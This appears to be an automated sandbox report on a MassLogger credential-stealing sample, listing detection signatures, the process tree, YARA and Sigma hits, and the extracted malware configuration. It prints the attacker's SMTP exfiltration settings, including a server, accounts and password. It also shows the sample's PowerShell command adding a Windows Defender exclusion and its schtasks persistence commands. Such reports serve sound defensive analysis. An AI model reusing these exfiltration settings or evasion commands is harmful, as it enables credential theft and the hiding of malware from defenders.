Edit tour

Windows Analysis Report
Contrarre.scr.exe

Overview

General Information

Sample name:	Contrarre.scr.exe
Analysis ID:	1592508
MD5:	aee9da9c20da235642f5772a556b7ced
SHA1:	6c9f69cf32c8430296caadd8eb7d9ee57fc5d1ee
SHA256:	784f9e5d1eedc785401f6397aab1d9fbfff7593262f8db591e50ae06d37cba02
Tags:	exeMassLoggerSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Contrarre.scr.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\Contrarre.scr.exe" MD5: AEE9DA9C20DA235642F5772A556B7CED)

powershell.exe (PID: 7572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7876 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7604 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp3B82.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Contrarre.scr.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\Contrarre.scr.exe" MD5: AEE9DA9C20DA235642F5772A556B7CED)

Contrarre.scr.exe (PID: 7756 cmdline: "C:\Users\user\Desktop\Contrarre.scr.exe" MD5: AEE9DA9C20DA235642F5772A556B7CED)

JkYcIYq.exe (PID: 7840 cmdline: C:\Users\user\AppData\Roaming\JkYcIYq.exe MD5: AEE9DA9C20DA235642F5772A556B7CED)

schtasks.exe (PID: 7988 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp48FF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

JkYcIYq.exe (PID: 8076 cmdline: "C:\Users\user\AppData\Roaming\JkYcIYq.exe" MD5: AEE9DA9C20DA235642F5772A556B7CED)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "serverhar244@gpsamsterdamqroup.com", "Password": "         feXwu@m?K@@L               ", "Server": "fiber13.dnsiaas.com", "To": "benfavour015@gmail.com", "Port": 587}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xfe9f:$a1: get_encryptedPassword 0x101c7:$a2: get_encryptedUsername 0xfc3a:$a3: get_timePasswordChanged 0xfd5b:$a4: get_passwordField 0xfeb5:$a5: set_encryptedPassword 0x11811:$a7: get_logins 0x114c2:$a8: GetOutlookPasswords 0x112b4:$a9: StartKeylogger 0x11761:$a10: KeyLoggerEventArgs 0x11311:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xefa7:$a1: get_encryptedPassword 0xf2cf:$a2: get_encryptedUsername 0xed42:$a3: get_timePasswordChanged 0xee63:$a4: get_passwordField 0xefbd:$a5: set_encryptedPassword 0x10919:$a7: get_logins 0x105ca:$a8: GetOutlookPasswords 0x103bc:$a9: StartKeylogger 0x10869:$a10: KeyLoggerEventArgs 0x10419:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.2614011404.0000000002F7B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf2ef:$a1: get_encryptedPassword 0x910e7:$a1: get_encryptedPassword 0xf617:$a2: get_encryptedUsername 0x9140f:$a2: get_encryptedUsername 0xf08a:$a3: get_timePasswordChanged 0x90e82:$a3: get_timePasswordChanged 0xf1ab:$a4: get_passwordField 0x90fa3:$a4: get_passwordField 0xf305:$a5: set_encryptedPassword 0x910fd:$a5: set_encryptedPassword 0x10c61:$a7: get_logins 0x92a59:$a7: get_logins 0x10912:$a8: GetOutlookPasswords 0x9270a:$a8: GetOutlookPasswords 0x10704:$a9: StartKeylogger 0x924fc:$a9: StartKeylogger 0x10bb1:$a10: KeyLoggerEventArgs 0x929a9:$a10: KeyLoggerEventArgs 0x10761:$a11: KeyLoggerEventArgsEventHandler 0x92559:$a11: KeyLoggerEventArgsEventHandler
0000000D.00000002.2613870891.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xfebf:$a1: get_encryptedPassword 0x84c67:$a1: get_encryptedPassword 0x9b887:$a1: get_encryptedPassword 0x101e7:$a2: get_encryptedUsername 0x84f8f:$a2: get_encryptedUsername 0x9bbaf:$a2: get_encryptedUsername 0xfc5a:$a3: get_timePasswordChanged 0x84a02:$a3: get_timePasswordChanged 0x9b622:$a3: get_timePasswordChanged 0xfd7b:$a4: get_passwordField 0x84b23:$a4: get_passwordField 0x9b743:$a4: get_passwordField 0xfed5:$a5: set_encryptedPassword 0x84c7d:$a5: set_encryptedPassword 0x9b89d:$a5: set_encryptedPassword 0x11831:$a7: get_logins 0x865d9:$a7: get_logins 0x9d1f9:$a7: get_logins 0x114e2:$a8: GetOutlookPasswords 0x8628a:$a8: GetOutlookPasswords 0x9ceaa:$a8: GetOutlookPasswords
Process Memory Space: Contrarre.scr.exe PID: 7392	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Contrarre.scr.exe PID: 7392	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Contrarre.scr.exe PID: 7392	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Contrarre.scr.exe PID: 7392	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Contrarre.scr.exe PID: 7392	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x51fbe:$a1: get_encryptedPassword 0x6dfa3:$a1: get_encryptedPassword 0x522d7:$a2: get_encryptedUsername 0x6e2bc:$a2: get_encryptedUsername 0x51d6d:$a3: get_timePasswordChanged 0x6dd52:$a3: get_timePasswordChanged 0x51e8e:$a4: get_passwordField 0x6de73:$a4: get_passwordField 0x51fd4:$a5: set_encryptedPassword 0x6dfb9:$a5: set_encryptedPassword 0x538d7:$a7: get_logins 0x6f8bc:$a7: get_logins 0x53588:$a8: GetOutlookPasswords 0x6f56d:$a8: GetOutlookPasswords 0x5337a:$a9: StartKeylogger 0x6f35f:$a9: StartKeylogger 0x53827:$a10: KeyLoggerEventArgs 0x6f80c:$a10: KeyLoggerEventArgs 0x533d7:$a11: KeyLoggerEventArgsEventHandler 0x6f3bc:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Contrarre.scr.exe PID: 7756	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Contrarre.scr.exe PID: 7756	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Contrarre.scr.exe PID: 7756	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Contrarre.scr.exe PID: 7756	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4b5a7:$a1: get_encryptedPassword 0x4b8c0:$a2: get_encryptedUsername 0x4b356:$a3: get_timePasswordChanged 0x4b477:$a4: get_passwordField 0x4b5bd:$a5: set_encryptedPassword 0x4cec0:$a7: get_logins 0x4cb71:$a8: GetOutlookPasswords 0x4c963:$a9: StartKeylogger 0x4ce10:$a10: KeyLoggerEventArgs 0x4c9c0:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: JkYcIYq.exe PID: 7840	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: JkYcIYq.exe PID: 7840	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: JkYcIYq.exe PID: 7840	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: JkYcIYq.exe PID: 7840	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: JkYcIYq.exe PID: 7840	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4afd2:$a1: get_encryptedPassword 0x4b2eb:$a2: get_encryptedUsername 0x4ad81:$a3: get_timePasswordChanged 0x4aea2:$a4: get_passwordField 0x4afe8:$a5: set_encryptedPassword 0x4c8eb:$a7: get_logins 0x4c59c:$a8: GetOutlookPasswords 0x4c38e:$a9: StartKeylogger 0x4c83b:$a10: KeyLoggerEventArgs 0x4c3eb:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: JkYcIYq.exe PID: 8076	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.JkYcIYq.exe.37f6d18.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.JkYcIYq.exe.37f6d18.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.JkYcIYq.exe.37f6d18.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.JkYcIYq.exe.37f6d18.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3a7:$a1: get_encryptedPassword 0xd6cf:$a2: get_encryptedUsername 0xd142:$a3: get_timePasswordChanged 0xd263:$a4: get_passwordField 0xd3bd:$a5: set_encryptedPassword 0xed19:$a7: get_logins 0xe9ca:$a8: GetOutlookPasswords 0xe7bc:$a9: StartKeylogger 0xec69:$a10: KeyLoggerEventArgs 0xe819:$a11: KeyLoggerEventArgsEventHandler
9.2.JkYcIYq.exe.37f6d18.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x123c1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x118bf:$a3: \Google\Chrome\User Data\Default\Login Data 0x11bcd:$a4: \Orbitum\User Data\Default\Login Data 0x129c5:$a5: \Kometa\User Data\Default\Login Data
0.2.Contrarre.scr.exe.4b84148.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Contrarre.scr.exe.4b84148.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Contrarre.scr.exe.4b84148.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Contrarre.scr.exe.4b84148.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3a7:$a1: get_encryptedPassword 0xd6cf:$a2: get_encryptedUsername 0xd142:$a3: get_timePasswordChanged 0xd263:$a4: get_passwordField 0xd3bd:$a5: set_encryptedPassword 0xed19:$a7: get_logins 0xe9ca:$a8: GetOutlookPasswords 0xe7bc:$a9: StartKeylogger 0xec69:$a10: KeyLoggerEventArgs 0xe819:$a11: KeyLoggerEventArgsEventHandler
0.2.Contrarre.scr.exe.4b84148.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x123c1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x118bf:$a3: \Google\Chrome\User Data\Default\Login Data 0x11bcd:$a4: \Orbitum\User Data\Default\Login Data 0x129c5:$a5: \Kometa\User Data\Default\Login Data
9.2.JkYcIYq.exe.386bac0.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.JkYcIYq.exe.386bac0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.JkYcIYq.exe.386bac0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.JkYcIYq.exe.386bac0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3a7:$a1: get_encryptedPassword 0xd6cf:$a2: get_encryptedUsername 0xd142:$a3: get_timePasswordChanged 0xd263:$a4: get_passwordField 0xd3bd:$a5: set_encryptedPassword 0xed19:$a7: get_logins 0xe9ca:$a8: GetOutlookPasswords 0xe7bc:$a9: StartKeylogger 0xec69:$a10: KeyLoggerEventArgs 0xe819:$a11: KeyLoggerEventArgsEventHandler
9.2.JkYcIYq.exe.386bac0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x123c1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x118bf:$a3: \Google\Chrome\User Data\Default\Login Data 0x11bcd:$a4: \Orbitum\User Data\Default\Login Data 0x129c5:$a5: \Kometa\User Data\Default\Login Data
0.2.Contrarre.scr.exe.4d5fcf8.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Contrarre.scr.exe.4d5fcf8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Contrarre.scr.exe.4d5fcf8.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Contrarre.scr.exe.4d5fcf8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3a7:$a1: get_encryptedPassword 0xd6cf:$a2: get_encryptedUsername 0xd142:$a3: get_timePasswordChanged 0xd263:$a4: get_passwordField 0xd3bd:$a5: set_encryptedPassword 0xed19:$a7: get_logins 0xe9ca:$a8: GetOutlookPasswords 0xe7bc:$a9: StartKeylogger 0xec69:$a10: KeyLoggerEventArgs 0xe819:$a11: KeyLoggerEventArgsEventHandler
0.2.Contrarre.scr.exe.4d5fcf8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x123c1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x118bf:$a3: \Google\Chrome\User Data\Default\Login Data 0x11bcd:$a4: \Orbitum\User Data\Default\Login Data 0x129c5:$a5: \Kometa\User Data\Default\Login Data
0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x105bc:$a9: StartKeylogger 0x10a69:$a10: KeyLoggerEventArgs 0x10619:$a11: KeyLoggerEventArgsEventHandler
0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x141c1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x136bf:$a3: \Google\Chrome\User Data\Default\Login Data 0x139cd:$a4: \Orbitum\User Data\Default\Login Data 0x147c5:$a5: \Kometa\User Data\Default\Login Data
9.2.JkYcIYq.exe.37f6d18.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.JkYcIYq.exe.37f6d18.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.JkYcIYq.exe.37f6d18.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.JkYcIYq.exe.37f6d18.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0x83f4f:$a1: get_encryptedPassword 0x9ab6f:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0x84277:$a2: get_encryptedUsername 0x9ae97:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0x83cea:$a3: get_timePasswordChanged 0x9a90a:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0x83e0b:$a4: get_passwordField 0x9aa2b:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x83f65:$a5: set_encryptedPassword 0x9ab85:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x858c1:$a7: get_logins 0x9c4e1:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x85572:$a8: GetOutlookPasswords 0x9c192:$a8: GetOutlookPasswords
9.2.JkYcIYq.exe.386bac0.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.JkYcIYq.exe.386bac0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.JkYcIYq.exe.386bac0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.JkYcIYq.exe.386bac0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0x25dc7:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0x260ef:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0x25b62:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0x25c83:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x25ddd:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x27739:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x273ea:$a8: GetOutlookPasswords 0x105bc:$a9: StartKeylogger 0x271dc:$a9: StartKeylogger 0x10a69:$a10: KeyLoggerEventArgs 0x27689:$a10: KeyLoggerEventArgs 0x10619:$a11: KeyLoggerEventArgsEventHandler 0x27239:$a11: KeyLoggerEventArgsEventHandler
9.2.JkYcIYq.exe.386bac0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x141c1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2ade1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x136bf:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a2df:$a3: \Google\Chrome\User Data\Default\Login Data 0x139cd:$a4: \Orbitum\User Data\Default\Login Data 0x2a5ed:$a4: \Orbitum\User Data\Default\Login Data 0x147c5:$a5: \Kometa\User Data\Default\Login Data 0x2b3e5:$a5: \Kometa\User Data\Default\Login Data
0.2.Contrarre.scr.exe.4b84148.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Contrarre.scr.exe.4b84148.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Contrarre.scr.exe.4b84148.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Contrarre.scr.exe.4b84148.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0x90f9f:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0x912c7:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0x90d3a:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0x90e5b:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x90fb5:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x92911:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x925c2:$a8: GetOutlookPasswords 0x105bc:$a9: StartKeylogger 0x923b4:$a9: StartKeylogger 0x10a69:$a10: KeyLoggerEventArgs 0x92861:$a10: KeyLoggerEventArgs 0x10619:$a11: KeyLoggerEventArgsEventHandler 0x92411:$a11: KeyLoggerEventArgsEventHandler
Click to see the 33 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Contrarre.scr.exe", ParentImage: C:\Users\user\Desktop\Contrarre.scr.exe, ParentProcessId: 7392, ParentProcessName: Contrarre.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe", ProcessId: 7572, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp48FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp48FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\JkYcIYq.exe, ParentImage: C:\Users\user\AppData\Roaming\JkYcIYq.exe, ParentProcessId: 7840, ParentProcessName: JkYcIYq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp48FF.tmp", ProcessId: 7988, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp3B82.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp3B82.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Contrarre.scr.exe", ParentImage: C:\Users\user\Desktop\Contrarre.scr.exe, ParentProcessId: 7392, ParentProcessName: Contrarre.scr.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp3B82.tmp", ProcessId: 7604, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Contrarre.scr.exe", ParentImage: C:\Users\user\Desktop\Contrarre.scr.exe, ParentProcessId: 7392, ParentProcessName: Contrarre.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe", ProcessId: 7572, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

